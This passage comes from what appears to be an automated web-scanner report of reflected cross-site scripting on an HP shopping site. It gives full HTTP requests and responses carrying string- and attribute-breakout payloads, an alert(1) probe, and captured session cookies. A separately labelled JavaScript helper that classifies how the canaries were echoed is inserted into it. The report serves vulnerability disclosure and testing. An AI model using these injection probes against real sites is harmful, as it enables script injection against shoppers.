gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253Dfunctionanonymous(e)%25257Bs_objectID%25253D%252522%25252Fwebapp%25252Fshopping%25252Fproduct_detail.do_storeName%25253Dcomputer_store%252526landing%2526oidt%253D2%2526ot%253DA%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

storeName=storefronts&landing=desktops&category=p7xt_series&subcat1=rts&product_code=BV704AA#ABA&catLevel=3&mc=&ajaxCall=true&tab=9b5cf"%20a%3db%20e97581269ec

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:29:26 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkoiNyT2w59Nijvv1PXcQyYmmvi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:29:25 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:29:25 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 206699

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=storefronts&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=9b5cf" a=b e97581269ec&fromPage=/shopping/product_detail.do">
...[SNIP]...

1.53. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the tab request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eeb3d"%3b7e30e750a3a was submitted in the tab parameter. This input was echoed as eeb3d";7e30e750a3a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /webapp/shopping/product_detail.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 137
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; 
gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253Dfunctionanonymous(e)%25257Bs_objectID%25253D%252522%25252Fwebapp%25252Fshopping%25252Fproduct_detail.do_storeName%25253Dcomputer_store%252526landing%2526oidt%253D2%2526ot%253DA%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

storeName=storefronts&landing=desktops&category=p7xt_series&subcat1=rts&product_code=BV704AA#ABA&catLevel=3&mc=&ajaxCall=true&tab=eeb3d"%3b7e30e750a3a

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:29:29 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkoiNyT2w59Nijvv1PXcQyYmmvi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:29:28 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:29:28 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 223239

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<landing|category|cat level|subcat1;sku;;>
var tabValue = "eeb3d";7e30e750a3a";
if ( tabValue.indexOf("reviews") >
...[SNIP]...

1.54. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the tab request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c44a"%3b2775de656cc was submitted in the tab parameter. This input was echoed as 4c44a";2775de656cc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=4c44a"%3b2775de656cc&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:11:04 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:11:04 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:11:04 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 207114

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<landing|category|cat level|subcat1;sku;;>
var tabValue = "4c44a";2775de656cc";
if ( tabValue.indexOf("reviews") >
...[SNIP]...
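The findings above all end with the same instruction: the canary terminated the string or attribute, no full proof of concept was found, examine the behaviour by hand. The script below is an added example, not code from the XSS.CX/Burp report or from the HP application: it takes a response body and a Burp-style canary (hex prefix, breakout characters, hex suffix), finds every place the canary was echoed, and reports per sink whether the quote came back raw, backslash-escaped, entity-encoded or stripped. It matters that it walks every occurrence, because the tab parameter lands in two sinks on the same page (the hidden nextPage input in 1.52/1.55 and the tabValue script variable in 1.53/1.54). The BODY_1_54 and BODY_1_52 samples are trimmed copies of the response excerpts for those findings; the `<script>` wrapper around the 1.54 excerpt and BODY_SAFE (the same two payloads with context-correct encoding) are constructed here.

```javascript
// Added example; not code from the XSS.CX/Burp report or from the HP application.
// Automates the "manually examine the application's behaviour" step for a Burp
// quote-breakout canary: locate every echo and classify it by the context it sits in.
// BODY_1_54 / BODY_1_52 are trimmed copies of the report's response excerpts; the
// <script> wrapper and BODY_SAFE are constructed sample data.

const BODY_1_54 =
  '<script type="text/javascript">\n' +
  'var tabValue = "4c44a";2775de656cc";\n' +
  'if ( tabValue.indexOf("reviews") > -1 ) { }\n' +
  '</script>';

const BODY_1_52 =
  '<input type="hidden" name="nextPage" value="/product_detail.do?storeName=storefronts' +
  '&tab=9b5cf" a=b e97581269ec&fromPage=/shopping/product_detail.do">';

// Constructed: the same two payloads after context-correct encoding.
const BODY_SAFE =
  '<input type="hidden" name="nextPage" value="/product_detail.do?tab=9b5cf&quot; a=b e97581269ec">\n' +
  '<script>var tabValue = "4c44a\\";2775de656cc";</script>';

const HTML_QUOTE_ENTITY = /&quot;|&#0*34;|&#x0*22;/i;

// Script context if the nearest <script before pos has not been closed yet.
function inScript(body, pos) {
  const lastOpen = body.lastIndexOf('<script', pos);
  return lastOpen !== -1 && lastOpen > body.lastIndexOf('</script', pos);
}

// Verdict for the characters echoed between the canary's prefix and suffix.
function classifyOne(between, context) {
  if (context === 'script') {
    if (/<\/script/i.test(between)) return 'script-block-terminated'; // escaping " alone is not enough
    if (/(^|[^\\])"/.test(between)) return 'js-string-terminated';    // unescaped " inside the literal
    if (between.includes('\\"')) return 'safe-js-escaped';
    if (HTML_QUOTE_ENTITY.test(between)) return 'entity-in-script';     // no breakout, but value mangled
    return 'quote-filtered';
  }
  if (between.includes('"')) return 'attribute-breakout';                // a backslash means nothing in HTML
  if (HTML_QUOTE_ENTITY.test(between)) return 'safe-html-encoded';
  return 'quote-filtered';
}

// One parameter can reach several sinks (tab hits a hidden input and a script
// variable on the same page), so report every occurrence rather than the first.
function classifyReflections(body, prefix, suffix) {
  const hits = [];
  let from = 0;
  for (;;) {
    const start = body.indexOf(prefix, from);
    if (start === -1) break;
    const end = body.indexOf(suffix, start + prefix.length);
    if (end === -1) { hits.push({ offset: start, verdict: 'suffix-missing' }); break; }
    const between = body.slice(start + prefix.length, end);
    const context = inScript(body, start) ? 'script' : 'html';
    hits.push({ offset: start, context, between, verdict: classifyOne(between, context) });
    from = end + suffix.length;
  }
  return hits;
}

// Usage: the tab canaries from findings 1.54 and 1.52 against the raw and the encoded body.
for (const [label, body] of [['1.54', BODY_1_54], ['1.52', BODY_1_52], ['safe', BODY_SAFE]]) {
  for (const [prefix, suffix] of [['4c44a', '2775de656cc'], ['9b5cf', 'e97581269ec']]) {
    for (const hit of classifyReflections(body, prefix, suffix)) {
      console.log(label, prefix, hit.context, JSON.stringify(hit.between), hit.verdict);
    }
  }
}
```

Two verdicts deserve attention when reading the output. `entity-in-script` is not a breakout, but it shows the application applied HTML encoding to a JavaScript sink, so the value the script receives is corrupted and the encoding was chosen by habit rather than by context. `attribute-breakout` is returned even when the quote is backslash-escaped, because an HTML parser gives the backslash no meaning; only an entity protects an attribute value.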

1.55. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1666"%20a%3db%20cc350728bb1 was submitted in the tab parameter. This input was echoed as a1666" a=b cc350728bb1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=a1666"%20a%3db%20cc350728bb1&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:11:01 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=n6npT6LGvyTl7004jygl2bzvh5H4dkMQBgxJNyjvjzzr7LTVLB4Y!1290690217; expires=Friday, 23-Sep-2011 01:11:00 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:11:00 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:11:00 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 207142

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=a1666" a=b cc350728bb1&fromPage=/shopping/product_detail.do">
...[SNIP]...

1.56. http://www.shopping.hp.com/webapp/shopping/store_access.do [category parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/store_access.do

Issue detail

The value of the category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1646f"a%3d"b"7e9af0dbff6 was submitted in the category parameter. This input was echoed as 1646f"a="b"7e9af0dbff6 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /webapp/shopping/store_access.do?template_type=series_detail&category=desktops1646f"a%3d"b"7e9af0dbff6&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e'%3b1cd62d1ca9e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; hpshopping=1&user_id=mlkqgtqf2Qt7MiHjv1bYeQeXlmvi; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e'%3B1cd62d1ca9e; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; lang=en-us; cc=us; prop12=r602; EMID=; s_depth=14; s_cc=true; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; 